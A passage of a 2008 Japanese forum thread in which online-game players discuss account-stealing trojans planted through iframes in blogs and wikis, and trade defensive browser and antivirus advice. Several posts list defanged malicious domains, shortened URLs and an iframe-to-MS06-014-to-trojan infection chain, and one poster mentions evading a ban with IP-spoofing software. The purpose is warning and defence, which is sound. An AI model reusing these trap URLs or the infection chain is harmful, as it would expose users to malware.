207 ：既にその名前は使われています：2008/03/13(木) 20:14:32.05 ID:Slq9ptja: >>199
あー…だめだなそこは…。
通報即デリのFC2やサーパラやドリコムのがまし。
208 ：既にその名前は使われています：2008/03/13(木) 20:18:24.59 ID:7FpSUMow: >>206
ん、だから■がそれをしてくれたとしても
無事なのはゲームのアイテムだけで
ＰＣ自体は無事じゃないからねーってこと。
■云々だけではもうどうにもならないなーって話だよ。
209 ：既にその名前は使われています：2008/03/13(木) 20:34:36.42 ID:DaQ2jwr9: >>208
セキュリティ会社のＨＰ云々ってあたりでグローバルな話と勘違いされてるのか？
上でネトゲパスを盗むトロイの可能性が高いみたいな事書いてあったから
あくまでネットゲームの範疇で言ったつもりだったんだ

そんなグローバルなことじゃなくって
いち運営会社が運営会社としてできる対応を考えろってことだ
認証方法の見直しってのはＰＯＬのことな

>>205
FireFoxはアドオンいれてなんぼだべ
210 ：既にその名前は使われています：2008/03/13(木) 20:44:31.33 ID:AODctOay: 罠サイトを直リンしてるやつ、わざだろ？
通報するぜ
211 ：既にその名前は使われています：2008/03/13(木) 20:44:34.76 ID:yUCf7QUF: 進学、就職で引退者が増える時期にハッキング被害の引退者も加わるのか
今月末でどれだかユーザーが減るのかな
まぁ、いままで問題放置してきた■が今更対策とるとは思えない
212 ：既にその名前は使われています：2008/03/13(木) 20:54:24.02 ID:rzgfFjCJ: 罠サイト対策とるまでやるのは流石に無理だぞ、ゲーム会社は
213 ：既にその名前は使われています：2008/03/13(木) 20:57:59.48 ID:S3LphSTg: たまにRMT広告が強制的に掲載されるのが困りものだが
amebloに戻るかな…
214 ：既にその名前は使われています：2008/03/13(木) 21:26:35.80 ID:DK6wU/Hs: 外部のサイトを規制するんじゃなくて、某国もしくはユーザーが個別に設定した
プロバ以外のPOLへのアクセスを遮断してくれればいい
215 ：既にその名前は使われています：2008/03/13(木) 21:36:41.83 ID:9VhF97La: 今バスターつかってるんだけどカスペに乗り換えたほうが良い？
216 ：既にその名前は使われています：2008/03/13(木) 21:51:01.14 ID:3opfrEel: >>215
ウイルス対策ソフトはクルマでいえばエアバッグみたいなもんだから
有名どころの製品を使っているならわざわざ買い換えることはないと思う。

自衛策として>>4-5をやって、さらに↓の実行を推奨。

・Real Playerがインストールされている場合は、アンインストールする
・IEやOperaでは、ブラウザの設定でiframeを無効にする
・Firefoxには拡張機能「Noscript」をインストールして、iframeが無効になるように設定
・Secunia PSIでインストール済みソフトに脆弱性が残っていないか確認
　引っかかったソフトはアップデートするかアンインストールする

Secunia PSIのダウンロードはここから。
ttps://psi.secunia.com/
217 ：既にその名前は使われています：2008/03/13(木) 22:08:05.69 ID:Whai5j31: まだ被害に有ったことの無い俺がやっていること。
セキュリティソフトを入れる。(avastが無料なので使ってる)
ブラウザを火狐にする。
火狐の追加機能でNoscriptを入れる。
エロサイトを覗いた後はオンラインスキャン。

この前の香港女優おまんこ画像探しに香港のサイトかなり彷徨ってしまった。
ウイルス怖いと思いつつ無修正画像には飛びついてしまう男のsaga。
色々防御策は講じてるがいつかやられるだろう。
218 ：既にその名前は使われています ：2008/03/13(木) 22:14:53.83 ID:fNANyHE7: 垢抜きやってる業者って
BANの報復も兼ねてやってるのかねぇ？
219 ：既にその名前は使われています：2008/03/13(木) 22:27:20.66 ID:9VhF97La: >>216
なるほど、了解
ブラウザsleipnir使ってるんだけど
火狐じゃないと危ないかな？
220 ：既にその名前は使われています：2008/03/13(木) 22:36:14.92 ID:3TWwQQa2: >>219
俺はプニルから狐に乗り換えた
ただプニルに慣れると使い勝手がやはり良くない
221 ：既にその名前は使われています：2008/03/13(木) 23:21:02.48 ID:3opfrEel: >>219
今どきは「IEは危険でFirefoxやOperaは安全」ということはないかと。
ただ、IE6には>>65で紹介された脆弱性が見つかっているからIE7へのバージョンアップを
勧めたい。しかし、IE7は不安定だという人もいる。
SleipnirでGeckoを使うという手もあるけど、安全になるかどうかは……。

>>216一部訂正
IEは単体でiframeを無効にできないようだ。
［インターネットオプション］の［セキュリティ］で「IFRAMEのプログラムとファイルの起動」を
「無効にする」に設定してもiframeの中身が表示されるし、JavaScriptも動く。
デフォルト設定は「ダイアログを表示する」だけど、今まで表示された覚えないもんなあ。
これ、何を防ぐ設定なんだろう。ActiveX？

追加。IEの［インターネットオプション］で「拡張子ではなく、内容によってファイルを開く」は
「無効にする」推奨ね。
222 ：既にその名前は使われています：2008/03/13(木) 23:48:13.20 ID:cebZ6MQn: IEのIFRAME自体の無効化はこれで出来ないものかね？

M'airsys.text　IEでIFrameタグ自体を無効にする
ttp://blog.livedoor.jp/mairsys/archives/417867.html
223 ：既にその名前は使われています：2008/03/13(木) 23:55:04.74 ID:3opfrEel: >>222　残念ながら。
スタイルシートで表示を消してもiframeの中身は取ってきた。
中身のJavaScriptも実行されてしまった。
224 ：既にその名前は使われています：2008/03/14(金) 00:08:07.66 ID:X6poRpzt: >>223
そうか、それでもダメということは。
IEは特別な理由ない限り使わんのが一番ってこったな。

俺はIE使うのはActiveX使ったネトゲランチャー起動とか
IE以外だと何故か文字入力できないブログで日記書く位だけどもさ。
225 ：既にその名前は使われています：2008/03/14(金) 00:23:33.24 ID:79QwqLyu: IEでインラインフレームを排除するにはページを書き換えられる
プロクシソフトを併用するしかないかもしれませんね
その手のローカルプロクシはProxomitronが有名かな
226 ：既にその名前は使われています：2008/03/14(金) 00:26:55.55 ID:FvN/OLkb: >>214
>>外部のサイトを規制するんじゃなくて、某国もしくはユーザーが個別に設定した
>>プロバ以外のPOLへのアクセスを遮断してくれればいい

あまり意味ない
インターネットにIP偽装ソフトウェアがいっぱいあります
簡単に手に入れるし、使い勝手もかなり良い

ちなみに俺も2CHにアク規制を巻き込まれた
ただいまははIP偽装ソフトウェア使って書き込みます
227 ：既にその名前は使われています：2008/03/14(金) 00:31:39.47 ID:NivMWxtv: >>226
日本語がお上手ですね＾＾
228 ：226：2008/03/14(金) 00:38:05.67 ID:ycAyv2B4: ×　ただいまははIP偽装ソフトウェア使って書き込みます
○　ただいまはIP偽装ソフトウェア使って書き込んでいる

で、言いたいのは、語言別鯖云々もあまり意味ない
業者ならどうせIP偽装してアクセスしてくる
困るのは海外にいる良善プレイヤーだけ

>>227
はい、実は外人です
あと、IP変わった
229 ：既にその名前は使われています：2008/03/14(金) 00:46:49.28 ID:3Iqhyue3: >>228
公式にサービス展開されてる国なら別に何も困らないと思いますよ。
230 ：既にその名前は使われています：2008/03/14(金) 00:49:01.42 ID:ycAyv2B4: >>229
ありがとう
公式にサービス展開されてない弱小国家だから困っているｗ
231 ：既にその名前は使われています：2008/03/14(金) 01:02:23.37 ID:79QwqLyu: 罠サイトのためにドメイン名を400個も取得しまくる業者なら
日本国内に中継ノードを作るくらいは簡単だろうし、実際に
ほかのゲームではそれが発覚して事件になったよね

リネ2のセキュリティカードっていうのはワンタイムパスワードの
一種なのかな？
何年も前にOPIEを使ったことがあるんだけど、面倒なだけあって
ワンタイムパスワードはかなり安心
232 ：既にその名前は使われています：2008/03/14(金) 01:04:25.45 ID:ycAyv2B4: ラストレス
別に煽りしてきたわけじゃない
垢ハック対策は全然意味ないって言いたくない
でも、インターネットってこんなもん

一番お勧め対策はやはりFF11専用機
FF11以外（のネット関連すること）は一切しないこと

これ以上は嫌われるかもしれない
では　ノシ
233 ：既にその名前は使われています：2008/03/14(金) 01:14:52.46 ID:79QwqLyu: >>232
うん、あなたが言うことは正しいと思った
嫌ったりはしないから、また遊びに来てね
234 ：既にその名前は使われています：2008/03/14(金) 02:10:36.01 ID:VVgb5AcE: まあ、そこまで日本語で応対出来るなら、意味とかわかるでしょ。
それを命じた人間が１番悪いのは万国共通。

悪人は国を越えてでもつかまって欲しいもんです。
235 ：既にその名前は使われています：2008/03/14(金) 03:54:42.41 ID:lPNrKKUP: あげ保守
236 ：既にその名前は使われています：2008/03/14(金) 04:24:24.11 ID:KRRWZtvd: ちょっと面白いこと思った。
公式からリンクされてるコミュニティサイトにすらウィルス張られてたらどうなるかなｗｗ
さすがに無視できんだろうｗｗ

開発員のパスまで抜かれたらﾌﾟｷﾞｬ━━━━━━m9(^Д^)━━━━━━!!!!!!
237 ：既にその名前は使われています：2008/03/14(金) 06:48:58.87 ID:fr0JfmS/: ミスラ臼魔道士奮闘記がいかにもウイルス仕込まれた感じになってるんだが
踏んじまったからパス変更してウイルススキャン中orz鬱だ・・・

放置系のブログは要注意だな。更新してると思って見るとこれだもんな
おまけにコメは認証だから他の閲覧者に注意を促すこともできん
238 ：既にその名前は使われています：2008/03/14(金) 07:34:19.20 ID:ekUMLFdv: >>237
何もないぞ?
239 ：既にその名前は使われています：2008/03/14(金) 08:19:52.10 ID:rcYssvy9: 保守
240 ：既にその名前は使われています：2008/03/14(金) 08:27:52.07 ID:rcYssvy9: ［OGC2008＃10］お金をかければよいわけではない？
その道のプロに聞く，オンラインゲームの不正アクセス対策
ttp://www.4gamer.net/games/000/G000000/20080314003/

↑主にユーザーがどうこうするじゃなく運営がなんかしろ、と言うスタンス
241 ：既にその名前は使われています：2008/03/14(金) 08:40:38.62 ID:QSExmRrU: Webページ改竄の攻撃で1万ページ以上が被害に、米McAfeeが報告
http://ime.nu/internet.watch.impress.co.jp/cda/news/2008/03/13/18800.html

>米McAfeeは12日、WebサイトにJavaScriptを埋め込む大規模な攻撃が発生し、1万ページ以上が被害にあったと見られると、同社Avert Labsの公式ブログで伝えた。
(中略)
>McAfeeでは、この攻撃により1万ページ以上が被害にあったと見られ、ダウンロードされるトロイの木馬のうち1つは、オンラインゲーマーを対象にしたものだとしている。
242 ：既にその名前は使われています：2008/03/14(金) 09:28:01.18 ID:ekUMLFdv: >>241
他板だけどageついでに。
http://ime.nu/enif.mmobbs.com/test/read.cgi/livero/1197889519/936-944
243 ：既にその名前は使われています：2008/03/14(金) 09:37:29.37 ID:zMlfYuK6: >>220
俺もすレイプ似るから狐に移った組

最初は不便だったけど
マウスジェスチャ追加したら気にならなくなった
244 ：既にその名前は使われています：2008/03/14(金) 10:07:13.93 ID:ekUMLFdv: Firefox3Beta4があまりに安定しておもしろくないので4Alphaにしてみた。
IE8BetaとSafari3Betaと併用してアカハック踏みまくり。
245 ：既にその名前は使われています：2008/03/14(金) 11:22:13.31 ID:iLe2/sII: >>179
これは酷い…、ウィルス対策ソフトの公式ページがウィルスばら撒いてましたってか
損害賠償請求してもいいんじゃねえかなこれは。
246 ：既にその名前は使われています：2008/03/14(金) 11:23:36.59 ID:ekUMLFdv: >>245
去年ESET(NOD32のとこ)もやらかした。
247 ：既にその名前は使われています：2008/03/14(金) 11:42:09.77 ID:ekUMLFdv: さぞ祭りになっているだろうとセキュ板行ったら
ウイルスブースターとか呼ばれてて笑っちまったｗ
248 ：既にその名前は使われています：2008/03/14(金) 12:36:17.51 ID:rcYssvy9: 保守
249 ：既にその名前は使われています：2008/03/14(金) 12:45:02.57 ID:e/BiOJZS: 今回のは大規模だな
ネトゲのアカ狙いでここまでやるとは＾＾；
250 ：既にその名前は使われています：2008/03/14(金) 12:50:22.01 ID:K1DaCbz8: ・金になる
・検挙されない
・検挙にいたるようになるまでかなーーーーーり時間がかかる
・やるだけやって逃げる余裕がたっぷりある

こんなトコかな？
251 ：既にその名前は使われています：2008/03/14(金) 12:53:15.88 ID:rcYssvy9: リスク少なくて金になるからなー
252 ：既にその名前は使われています：2008/03/14(金) 13:28:42.08 ID:xVWWIBAP: 国自体が守ってるからな
あと軍備も拡大中で色々危険な国ではある
253 ：既にその名前は使われています：2008/03/14(金) 13:33:56.99 ID:K1DaCbz8: ただ、あの国の事だから
“サイバーテロ国家じゃないなら犯人出しやがれ”ってやられたら
“犯人はこいつ等です、国家とかカンケーないです、もう処刑しましたｗ”
ってやっちゃう国でもある
254 ：既にその名前は使われています：2008/03/14(金) 14:02:27.74 ID:X6poRpzt: 最近また短縮URL使い出したから気をつけてくれよな!

罠コメのリンクと罠ブログ(通報で消去済み)のIFRAMEに仕込まれていた。
＊罠コメ
FF11磔因｣ｬｹ･ﾂﾔ｣ｬﾘ怏ﾓ｣ｬBBS｣ｬﾎ菷?ﾀｾﾟﾑuﾗ
URL:｡｡http://ime.nu/tinyurl■com/3xrz52
FF11ｹｫﾊｽ･ﾚｩ`･ｸ｡｣FF11磔因･ｹ･ｯ･・`･?ｷ･逾ﾃ･ﾈ｣ｬ･ﾒ･?ﾇ･ﾟ･ﾃ･ﾈ･ｵｩ`･ﾐｩ`ﾋ??ﾎ･ﾉ･・`･ﾕ､ﾋ､隍・菷?｢ｷﾀｾﾟﾑuﾗ?FF11ﾓ嶐ﾟ FF11ｹ･ﾂﾔ FF11ﾘ

箇
http://ime.nu/www■soracger■com/wiki/
2008/03/14(金) 12:54 | URL | 娼鯖祥窟 #-[ 編集

ttp://tinyurl■com/3xrz52

続く
255 ：既にその名前は使われています：2008/03/14(金) 14:03:08.76 ID:X6poRpzt: 続き

＊罠ブログ
fgvcdy6hgbu854.blog10■fc2■com/

サイズ0で仕込まれているもの
tinyurl■com/2lzn6h
soracger■com

判らんのが短縮の飛び先がどっちもペイパルってこと、罠ブログにはサイズ0で仕込んでいたことでなおわけ判らん。
まさか、ね。
256 ：既にその名前は使われています：2008/03/14(金) 14:07:41.75 ID:MBobY2Ir: 罠コメといえば学者関係の記事に

お久し振りです(●'-')
新ｼﾞｮﾌﾞ・・興味はあるものの、私もまだまだやらなきゃいけない事いぱーいなので、手を付ける予定はありません(/ω＼*)
でも、学者ｻﾝのAF着てみたいなぁ～

のコメがやたら張られてるね。普通のコメントからのコピペだろうけど。【気をつけてください】
257 ：既にその名前は使われています：2008/03/14(金) 14:17:04.33 ID:ekUMLFdv: よくわからんので踏んでみた。
>>254
tinyurl■com/3xrz52
→www■homepuon■net/blog/
>>255
そのブログはiframeが3匹いる。
www■soracger■com/blog/
(widthの前にスペースが入っていなくて/blog/widthとなって404になって失敗する)
tinyurl■com/2lzn6h
→www■soracger■com/blog/
(上記を反省して短縮URIにしてみました)
www■gamtyblog■net/wiki/
(鶏頭なので同じホストをもう1匹仕込んじゃいました)
>飛び先がどっちもペイパル
(ﾟдﾟ)…
258 ：既にその名前は使われています：2008/03/14(金) 14:23:59.74 ID:X6poRpzt: >>飛び先がどっちもペイパル
>(ﾟдﾟ)…

ソースチェッカーオンラインで件の短縮調べてるとこうでるのよ。
その場でソースではなくロケーションヘッダ追ってると、ね。
※ フォームタグを発見しました。(1)
https://www/■paypal■com/cgi-bin/webscr
259 ：既にその名前は使われています：2008/03/14(金) 14:28:34.62 ID:e/BiOJZS: >>258
Tinyurlのプレビュー機能をONにしてると
リダイレクト確認ページが表示される

そこにもともとPaypalへのリンクがあるみたい
260 ：既にその名前は使われています：2008/03/14(金) 14:30:10.45 ID:79QwqLyu: >>258
tinyurlのプレビュー画面にあるpaypalで寄付してねフォームみたい
なんでプレビューが有効になってるんだろうという疑問は残りますが
261 ：既にその名前は使われています：2008/03/14(金) 14:32:49.44 ID:e/BiOJZS: かぶったな
プレビューデフォに仕様変更したのかな
262 ：既にその名前は使われています：2008/03/14(金) 14:34:26.36 ID:ekUMLFdv: >>258
そのソースチェッカーで右のソース見るとさらにformにpostしてるっしょ。
hiddenでごちゃごちゃ暗号化してある部分が
サーバ内で持ってる飛び先と紐付けされていて
見ただけじゃ飛び先わからんようになってるんじゃないかな。
263 ：既にその名前は使われています：2008/03/14(金) 14:35:59.21 ID:X6poRpzt: 短縮は調べんの失敗だったか、反省。
しかし短縮併用でステルスを仕込む数が増えてきているので注意だな。

話は代わりFC2罠ブログ今日見つけて通報したのだけで4つ。
他のブログサービスと合わせて毎日作っているな、こりゃ。
地元で広告でも打ってんのかもしれんね。
FC2にアカウントを作るといくら、とかさ。

あと今朝ライブドアWikiの方にもIDを2つ作って罠Wiki構築してるのも確認。
リンク先は言うまでもなくFC2なんで通報して消滅。
それらもステルス短縮＋罠ドメの混合IFRAMEトラップだった。

FFカテなのにリネWiki。
こっちは厄介だけどな、罠Wiki消しても罠ブログが作れるからな。
利用規約に欠陥があるし。
”違反行為をしないものとします”以下何もなし。
264 ：既にその名前は使われています：2008/03/14(金) 14:38:13.38 ID:79QwqLyu: リロードしてなかたorz
>>261
ソースチェッカーオンラインがプレビューONのcookie食べてる
ようですね
265 ：既にその名前は使われています：2008/03/14(金) 14:41:09.86 ID:ekUMLFdv: >>263
サーパラも負けてないぞ。
通報した罠ブログの数としてはFC2とあまり変わらないんだけど
利用者数が少ないので罠ブログの割合としては恐ろしく高い。

利用者数が少ないから
ttp://blog.surpara.com/blogList.html
で1日分全部チェックしても大した手間じゃなかったりする。
テンプレデフォで中身スッカスカなのは後日仕込むために
アカだけ大量に取ってるのかもしれん。
266 ：既にその名前は使われています：2008/03/14(金) 14:46:03.50 ID:ekUMLFdv: 続き
www■soracger■com/blog/
www■gamtyblog■net/wiki/
www■homepuon■net/blog/
↓iframe
www■caremoon■net/wiki/main.htm
↓MS06-014スクリプト
www■soracger■com/wiki/admin.exe
8日製造。既に監視中のトロイだった。
267 ：既にその名前は使われています：2008/03/14(金) 14:49:04.01 ID:ekUMLFdv: すまん
ttp://blog.surpara.com/blogList.html
調子悪そうだ。新着日がメンテか何かの日時になってあてにならん
(普通なら新着は日に10件も無い)。
というか個別に飛ぶと403なのでサーパラブログそのものが調子悪いのかも。
268 ：既にその名前は使われています：2008/03/14(金) 14:54:49.67 ID:79QwqLyu: >>267
そのページの右上にあるボタン「SURAPARA」になってる
そういう名前のサービスもある？　ミス？

悪用されるサービスが増えて、ブラックリストの管理が
面倒になってきたー
269 ：既にその名前は使われています：2008/03/14(金) 14:55:57.01 ID:ekUMLFdv: >>268
おお…よく気がついたね!
次の通報の時に言ってみるｗ
270 ：既にその名前は使われています：2008/03/14(金) 15:07:30.33 ID:ekUMLFdv: 続き
admin.exe、どんなんだか忘れたので拾いなおしてみた。
200kB近い(アカハックにしては)巨大なサイズは
自己解凍cabのため。
2匹入っていて片方はff11.exeというアレな感じのファイル。
たぶん数社に提出したと思う。
271 ：既にその名前は使われています：2008/03/14(金) 15:48:05.96 ID:nOgQKZ6q: あげ
272 ：既にその名前は使われています：2008/03/14(金) 15:52:29.78 ID:k5TGyDU9: 初心者質問ですまんのだが
iframeっていうのはテンプレじゃなく
記事本文のどっかを改竄されて仕掛けられたりする可能性はある？
ちなみにFC2ブログ利用者です('A｀)
273 ：既にその名前は使われています：2008/03/14(金) 16:20:36.90 ID:YYQMZCbq: 話題のiframeについて記事読んでみたけれど
親元が提供しているHTML文に中華がハックして
ウイルス埋め込んでたんだな。
普通のブログ開いたら、もれなく罠サイトも開くって仕組みか。
274 ：既にその名前は使われています：2008/03/14(金) 16:43:03.95 ID:X6poRpzt: >>272
FC2ブログで過去に乗っ取りでリンク部分を罠に変えられたとかIFRAME仕込まれた事例はある
リネ資料室に出ている”ごま醤油日記サイト”とあとはどこだった失念。

ttp://lineage.nyx.bne.jp/misc/security/id_virus-site.html#GOMA
ごま醤油は2回やられたと言うから中華に一度目を付けられたが最後って奴だな。
罠コメとか解析に中華反応があったら以後頻繁にパスを変えないと危険。
275 ：既にその名前は使われています：2008/03/14(金) 16:43:37.10 ID:ekUMLFdv: >>272
ブログのアカウント情報が漏れたことで書き換えられたのなら当然考えられる。
テンプレに仕込むほうが気づかれにくいし効果的だからやらんだろうけど。
276 ：既にその名前は使われています：2008/03/14(金) 17:35:02.27 ID:ekUMLFdv: iframe src=罠ばかり話題になっちゃったけど
script src=罠も注意ね。
ブログで使えるかどうかは知らないけど。
277 ：既にその名前は使われています：2008/03/14(金) 19:32:10.96 ID:Ze6Hci+A: すみません。
先ほどカスペルスキーオンラインウィルススキャンをしたら
「Trojan-Dropper.Win32.Agent.fwa」というトロイが検出されたのですが、
これがどういう物かわかる方おられないでしょうか・・・？
今週に入ってから何度かスキャンしても何も検出されなかったのに今日に
なって突然検出されたのでかなり焦ってます・・・。
ネットも特にやっていなかったので原因が全くわかりません。
カスペのウィルス辞典にもないしググっても全くなにもわからないのですが、
これってもしかして誤検出なんでしょうか？
ちなみにマカフィーでスキャンしたら何も検出されませんでした。
わかる方どうかお願いしますm(__)m
長文失礼致しました。
278 ：既にその名前は使われています：2008/03/14(金) 19:34:40.94 ID:ZYDFUXwp: >>277
http://ime.nu/www.f-secure.co.jp/v-descs/v-descs3/small_wy.htm
279 ：既にその名前は使われています：2008/03/14(金) 19:40:07.54 ID:G21LsoIM: >>277
オンラインスキャンしたなら結果保存して、どのファイルがそれに該当するかも書いてほしい
誤検知の可能性もあるがファイルがわからないと何ともいいにくい

まあマジ物ならカスペの試用版で削除できるが
280 ：既にその名前は使われています：2008/03/14(金) 19:47:41.98 ID:Ze6Hci+A: >>279
どう書いていいのかよくわからなくて申しわけないのですが、
感染していたのは
C:\Documents and Settings\All Users\Application Data\
　SingleClick Systems\HomeNet Manager\Intro\intro.exe　と、
C:\Program Files\Dell Network Assistant\Intro\intro.exe
の二つのファイルでした。二つとも同じフォルダの他のファイルは
「ロックされています」という結果がでていたのですが
この二つだけが「Trojan-Dropper.Win32.Agent.fwa」に感染しています。
とでてくるんです・・・orz
281 ：既にその名前は使われています：2008/03/14(金) 20:12:01.42 ID:ekUMLFdv: オンラインスキャナでは検知のみで駆除はしない。
体験版でも入れて駆除し、その後に製品版の購入を検討せよ。
282 ：272：2008/03/14(金) 20:30:54.11 ID:k5TGyDU9: 可能性としてはなくはないんだな…。
そかーありがとう。
最新記事ならともかく古い記事の本文とか改竄されたら
気付かなそうだなーと思ってさ。

>script src=罠も注意ね。

こっちも引き続き気を付けたほうがいいんだな…
ありがとう。
283 ：既にその名前は使われています：2008/03/14(金) 21:32:28.53 ID:2j1A/4JL: ぺってんのサイト、まだ危ないの？
284 ：既にその名前は使われています：2008/03/14(金) 21:51:59.08 ID:ekUMLFdv: 今は大丈夫だよ。将来は保障しないけど。
285 ：既にその名前は使われています：2008/03/14(金) 22:19:25.16 ID:VVgb5AcE: 危ない＝行かなければどうという事は無い。という人間には、
｢今はネットが危ないから、ネットに繋げない方がいいよ｣と教えてあげればいいじゃないか。
286 ：既にその名前は使われています：2008/03/14(金) 22:35:55.53 ID:L+s1xdAL: いつも勉強させて貰っています。質問すいませんです。
FirefoxにNoscript入れたんですが、設定での全般とインターフェイスの項目の
全てのjavascriptを許可のチェックを外しでおｋですか？
それとPlugins設定でIFREM禁止にチェックでおｋでしょうか？

Noscript入れたら更新する時に一瞬画面が黒くなるのですが仕様です？
287 ：既にその名前は使われています：2008/03/14(金) 22:44:18.59 ID:3Iqhyue3: >>286
そこまでいくとセキュリティ関係の板で聞いた方がいいかも
288 ：既にその名前は使われています：2008/03/14(金) 22:46:01.36 ID:2ghMhlAd: >>286
ググっても分からなかった？

ちなみに画面が黒くなるのは俺も
289 ：既にその名前は使われています：2008/03/14(金) 22:50:16.61 ID:L+s1xdAL: 素早いレスありがとうございます。
暗転は仕様ぽいみたいで安心しましたｗ
PluginsでIFREM禁止でいいのかが気になります
290 ：既にその名前は使われています：2008/03/14(金) 22:51:07.13 ID:ekUMLFdv: R-TYPEでも出てきそうな名前だな
291 ：既にその名前は使われています：2008/03/14(金) 23:15:31.90 ID:zmgD3HHB: 注意喚起age
292 ：既にその名前は使われています：2008/03/14(金) 23:27:40.81 ID:LWnZVWDZ: Avast!のページにAdministratorsにしたままだとヤバスってあったから
PowerUserにしたらPG2とかPSIが起動できません！て怒ってきた

どっちにすればいいんだ(´・ω・｀)
293 ：既にその名前は使われています：2008/03/15(土) 01:45:52.19 ID:FQ5tI1Fk: おやすみ上げ
>>292
adminでPG2を立ち上げておいた方が、垢ハックに関しては安全だろうな
294 ：既にその名前は使われています：2008/03/15(土) 02:13:50.86 ID:j5yWfBJ0: >>289
はい。Pluginsタブの「<IFRAME>の禁止」にチェックでインラインフレームを禁止できます。
295 ：既にその名前は使われています：2008/03/15(土) 02:15:29.78 ID:CgPw82vE: 話題にでないけど、kingsoftのフリーのはどうなの？

みんな中国のだから敬遠してるだけ？

これ以外のフリーで、ネトゲしてても重くないのってどういうのがあるの？
296 ：既にその名前は使われています：2008/03/15(土) 02:53:28.75 ID:4vM5gly/: >>295
釣り？ｗ
Kingは論外
297 ：既にその名前は使われています：2008/03/15(土) 02:54:13.21 ID:lDhxxzGq: 漏れの観点では、
キングとソースは、例え無料だとしても
候補に上がらないレベル
298 ：既にその名前は使われています：2008/03/15(土) 03:41:13.35 ID:r1JgwSgx: エレメンからWikiに飛んだら白いページに飛ばされたんだが・・
299 ：既にその名前は使われています：2008/03/15(土) 04:55:15.93 ID:6V3s8o7M: とりあえず無料のVMwarePlayerいれとけ。
で、仮想環境でネット汁。ブックマークはどこかwebサービス経由させて移植すればいい。
windowsのライセンス一個なんてハックされるのと比べたら安いもんだ。
toolsも入れたら超便利だぜ
300 ：既にその名前は使われています：2008/03/15(土) 05:35:32.61 ID:wxfd3WkK: >>298
それっていつ、どこのwikiで？

FINAL FANTASY XI Wikiなら一昨日当たり
一部のページが壊れて真っ白になってたらしいよ。
301 ：既にその名前は使われています：2008/03/15(土) 07:59:38.44 ID:M1DiBH3o: 保守
302 ：既にその名前は使われています：2008/03/15(土) 10:39:05.19 ID:Qtbh2Ozf: KIS!
KIS!
KISはKin・・・Kaspersky＾＾；
303 ：既にその名前は使われています：2008/03/15(土) 12:15:35.37 ID:0RLc2BGd: ZoneAlarmのファイアオールソフトでオンライン詐欺保護（登録したパスが送信されそうになると警告）
ってのがあるけど
これにPOLパスワードを入力して、POLパスは毎回入力にして
そうしたら防げないかな？逆にPCにパス入れてることになるから危険？
304 ：既にその名前は使われています：2008/03/15(土) 12:30:01.31 ID:FQ5tI1Fk: 被害者が個別スレを建ててしまったようなので上げとく
305 ：既にその名前は使われています：2008/03/15(土) 12:37:03.28 ID:M1DiBH3o: >>303
どっちもどっち、キーロガーだって有るッしょ？

でもパスワード変更は頻繁にやった方が良いかもね。
垢ハックされた時、何年も変えてませんとか言ったら
それを理由に通常得られる保証を得られないかもしれない。

そんなに怖いならPS2(3)に乗り換えてからパス変えて
それまで使っていたPCはHDDフォーマットしてFF11入れなければいいよ。
306 ：既にその名前は使われています：2008/03/15(土) 12:49:09.57 ID:D9+xAtmq: >>304
その個別スレに付いてるレスを見る限り
まだまだ被害者に留まらず、現況を知らずな人が多い感じだなぁ
307 ：既にその名前は使われています：2008/03/15(土) 13:29:31.87 ID:FQ5tI1Fk: こんなに続いてるスレなのに知名度が低いことがよく分かるｗ
皆テンプレくらい見てほしいなぁ
308 ：既にその名前は使われています：2008/03/15(土) 13:31:23.66 ID:mzDAnimW: まったくだねｗ
もう向こう３００超えちまったｗ
309 ：既にその名前は使われています：2008/03/15(土) 14:15:02.81 ID:XD+Rz95R: このお祭り騒ぎがいい方向に作用すればいいんだけどな
310 ：既にその名前は使われています：2008/03/15(土) 14:43:01.92 ID:V3E9/m3R: ひとまずキャラ隔離来た
311 ：既にその名前は使われています：2008/03/15(土) 14:48:51.00 ID:FQ5tI1Fk: あれだけ盛り上げてもらってある意味うらやましいなｗ
ここに報告した被害者も皆同じ道を通ってるのに
312 ：既にその名前は使われています：2008/03/15(土) 14:49:52.25 ID:88lC05aF: 鹿料理ランチレストランの事が新聞に載りました。
://hokkaido-np■blog■drecom■jp/

ヴァナモンブログに貼り付けられていたスパム。
ソースチャッカーオンラインでiframe有りと出た。
iframeで表示されるサイトは中国福建省竜岩(longyan)のもの。
サイトの所在地が竜岩な時点で黒でござろう。
おそらくウイルス自体は既存のものと予想する。
313 ：既にその名前は使われています：2008/03/15(土) 14:57:19.61 ID:WZXVrvbx: あっちのスレ、リアルタイムでやってるってのが大きいんだろうな･･･
314 ：既にその名前は使われています：2008/03/15(土) 14:59:53.60 ID:TQiaCE/W: 個別スレでスレタイがめちゃめちゃわかりやすいしねｗ
315 ：既にその名前は使われています：2008/03/15(土) 15:00:39.74 ID:mzDAnimW: あぁ、それがあるか。しかも休日だし
316 ：既にその名前は使われています：2008/03/15(土) 15:06:55.91 ID:XD+Rz95R: あの被害者の件が落ち着いたのは何よりだが
「ハックされたらスレをたてて実況しながらレジコ乞食すれば良い」みたいな
変な認識が産まれたら困るな
317 ：既にその名前は使われています：2008/03/15(土) 15:08:49.79 ID:H6xOjzpE: 方々からプレゼントも来そうだ
318 ：既にその名前は使われています：2008/03/15(土) 15:10:37.09 ID:TQiaCE/W: >>316
でも似たような感じで垢買いってバレてフルボッコになったのもあったしｗ
スレたててやる方も疑われること前提でやる覚悟いるかとｗ
319 ：既にその名前は使われています：2008/03/15(土) 15:15:29.99 ID:hiN6ZFhA: いい方向にいきゃいいが、ヘンに□e叩きに走らないいが。
業者より□eの方が叩きやすい位置にいるからな。
320 ：既にその名前は使われています：2008/03/15(土) 15:24:47.67 ID:D9+xAtmq: 要は、本当に自衛する気があって未然に知る努力をするかしないかだなぁとおもた
あっちのスレの知らないゆえの無知識さぶりに
まだまだ垢ハック被害は終わらないだろうと核心した
321 ：既にその名前は使われています：2008/03/15(土) 15:41:26.06 ID:1ztAgSot: 結局今流行のiframeのウィルスはどうすれば防げるんだ？
ブラウザ火狐にしてiframe無効＆Realplayerアンインスコでいいのだろうか？

Realのコーデック入れて大丈夫だよね？
322 ：既にその名前は使われています：2008/03/15(土) 15:45:31.08 ID:9UGVJMjR: おいこのスレはやすぎ
323 ：既にその名前は使われています：2008/03/15(土) 15:47:15.88 ID:9UGVJMjR: realプレイヤーは使ってると勝手に動画や音楽ファイルの関連付けをrealに変えるから
イライラしてアンインスコしたっけ。realじゃないと観れないお気に入りエロ動画も
あったが、uzeeeeeeので仕方ない。
324 ：既にその名前は使われています：2008/03/15(土) 16:01:15.40 ID:JCCtbPTG: コーデック入れてＧＯＭプレイヤー使えよｗ

あとはぐぐれ
